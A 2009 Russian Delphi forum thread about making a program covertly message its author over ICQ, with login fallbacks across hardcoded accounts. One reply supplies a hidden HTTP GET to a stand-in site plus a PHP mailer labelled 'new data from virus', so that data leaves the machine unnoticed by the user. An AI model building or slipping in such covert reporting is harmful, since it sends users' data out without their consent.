Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Работа с сетью в Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 17.01.2009, 00:53   #1
Port 111
Пользователь
 
Регистрация: 12.01.2009
Сообщений: 34
По умолчанию ICQCLient... ERROR

Здравствуйте. Использую в своей программе компонент ICQClient v1.34
Мне необходимо чтобы когда в программе происходило определенное действие отправлялось сообщение на мне на аську.
Но проблема в следующем, если программу запущенна в нескольких экземплярах одновременно или UIN отправили в тайм аут (если программу запускали много раз), то icqclient не коннектится ... тогда мне необходимо чтобы icqclient использовал для отправки другой UIN.
В связи с этим у меня несколько проблем:

1. Если хочу использовать событие OnError
Код:
procedure ICQClient1Error(Sender: TObject; ErrorType: TErrorType;
      ErrorMsg: String);
то Delphi выдает ошибку [Error] Unit1.pas(72): Undeclared identifier: 'TErrorType'
Почему и как поправить?

2. Так как событие OnError я не могу использовать, то использую событие ICQClient1ConnectionFailed.
ТО есть если оно происходит мне надо подключиться под другим UIN'ом из списка.
Написал процедуру
Код:
procedure TForm1.ICQEnter(icqclient :TICQClient);
begin
  case EnterUIN of
    0:
    begin
      icqclient.UIN:=111111;
      icqclient.Password:='123456';
      icqclient.Login(0);
    end;
    1:
    begin
      icqclient.UIN:=2222222;
      icqclient.Password:='123456';
      icqclient.Login(0);
    end;
    2:
    begin
      icqclient.UIN:=333333;
      icqclient.Password:='123456';
      icqclient.Login(0);
    end
    else
    begin
    icqclient.UIN:=4444444;
    icqclient.Password:='123456';
    icqclient.Login(0);
    end;
  end;
end;
и вызываю её в событии ICQClient1ConnectionFailed
Код:
EnterUIN:=EnterUIN+1;
  ICQEnter(ICQClient1);
Для проверки, специально ложил первый UIN в тайм аут и запускал.
Происходит следующие: Событие ICQClient1ConnectionFailed срабатывает
EnterUIN увеличивается и становиться равным 1, потом выполняется кусок из case of
Код:
 1:
    begin
      icqclient.UIN:=2222222;
      icqclient.Password:='123456';
      icqclient.Login(0);
    end;
И всё и НЕ логиниться и НЕ вызывается событытия ICQClient1ConnectionFailed

Пожалуйста помогите...что не так?
Заранее спасибо
Port 111 вне форума Ответить с цитированием
Старый 17.01.2009, 00:58   #2
Dj_smart
Капсула от спама
Форумчанин
 
Аватар для Dj_smart
 
Регистрация: 04.03.2008
Сообщений: 779
По умолчанию

PHP + Email будет проще. Типо сложить скрипт а потом http запросом отчеты давать . Могу помочь 9804336
Если данный ответ не столь конкретен, как Вы желаете его увидеть, возможно необходимо поразмыслить, стоит ли вопрос того, чтобы о нём спрашивать на форуме?
CncFiles.ru - бесплатный файловый хостинг
Dj_smart вне форума Ответить с цитированием
Старый 17.01.2009, 01:01   #3
Port 111
Пользователь
 
Регистрация: 12.01.2009
Сообщений: 34
По умолчанию

Мне надо чтобы это всё незаметно для пользователя проходило, я так понимаю если через e-mail то крыть не получится.

Хочу именно с ICQ разобраться, я просто не понимаю в чем проблема, и мне интересно...
Port 111 вне форума Ответить с цитированием
Старый 17.01.2009, 01:12   #4
Dj_smart
Капсула от спама
Форумчанин
 
Аватар для Dj_smart
 
Регистрация: 04.03.2008
Сообщений: 779
По умолчанию

Нет, вы меня не поняли - от вас потребуется отправить GET запрос серверу (с ПХП), который уже сам отправит то что вы в указали на мыло.
Код:
IdHttp1.GET('http://yoursite.ru/haha.php?text='+edit1.text);
а в скрипте (пхп скрипт назвать надо haha.php и положить в корень домена _www.yoursite.ru ) :
PHP код:
<?php
  $text
=$_GET['text'];
  
mail('Ok! New data from virus :)','Ваш емайл',$text);
  echo 
'Ok';
?>
Если данный ответ не столь конкретен, как Вы желаете его увидеть, возможно необходимо поразмыслить, стоит ли вопрос того, чтобы о нём спрашивать на форуме?
CncFiles.ru - бесплатный файловый хостинг
Dj_smart вне форума Ответить с цитированием
Старый 17.01.2009, 01:19   #5
Port 111
Пользователь
 
Регистрация: 12.01.2009
Сообщений: 34
По умолчанию

Спасибо огромное, очень полезная информация. Вопрос в функции mail первый параметр это что?

Но вопрос по ICQ остается ОТКРЫТЫМ!

Последний раз редактировалось Port 111; 17.01.2009 в 01:31.
Port 111 вне форума Ответить с цитированием
Старый 17.01.2009, 01:29   #6
goblinyara
Форумчанин
 
Аватар для goblinyara
 
Регистрация: 02.01.2009
Сообщений: 340
По умолчанию

хммм... насколько я понял - заголовок сообщения...
DelphiWorld 6. Скачай, поставь, и будет тебе счастье=)
Программирование, как и любовь -- одно слово, за которым скрывается бесконечное множество занятий.
goblinyara вне форума Ответить с цитированием
Старый 17.01.2009, 01:44   #7
Port 111
Пользователь
 
Регистрация: 12.01.2009
Сообщений: 34
По умолчанию

Цитата:
Сообщение от goblinyara Посмотреть сообщение
хммм... насколько я понял - заголовок сообщения...
goblinyara, не совсем понял ваше сообщение
Port 111 вне форума Ответить с цитированием
Старый 17.01.2009, 11:25   #8
Dj_smart
Капсула от спама
Форумчанин
 
Аватар для Dj_smart
 
Регистрация: 04.03.2008
Сообщений: 779
По умолчанию

Да, goblinyara был прав это заголовок сообщения. (В смысле емайл сообщения) А Вы подумали что заголовок его сообщения?
Если данный ответ не столь конкретен, как Вы желаете его увидеть, возможно необходимо поразмыслить, стоит ли вопрос того, чтобы о нём спрашивать на форуме?
CncFiles.ru - бесплатный файловый хостинг
Dj_smart вне форума Ответить с цитированием
Старый 17.01.2009, 16:33   #9
Port 111
Пользователь
 
Регистрация: 12.01.2009
Сообщений: 34
По умолчанию

Всё еще жду помощи по вопросам....
Port 111 вне форума Ответить с цитированием
Старый 17.01.2009, 18:57   #10
KORN
Банхаммер
Участник клуба
 
Аватар для KORN
 
Регистрация: 17.02.2007
Сообщений: 1,754
По умолчанию

icqclient.Login(0);
а тут разве не boolean переменная7 т.е. icqclient.Login(true); это для начала подключения
Перед тем как спросить ищи на форуме и в GOOGLE
KORN вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ICQClient контакт-лист DOLBY Компоненты Delphi 6 14.11.2008 22:38
ICQClient отправка смс DOLBY Работа с сетью в Delphi 0 06.10.2008 10:24
помогите с компонентом ICQclient xakkkkker Работа с сетью в Delphi 2 02.01.2008 14:03
помогите с компонентом ICQClient xakkkkker Компоненты Delphi 1 25.12.2007 14:24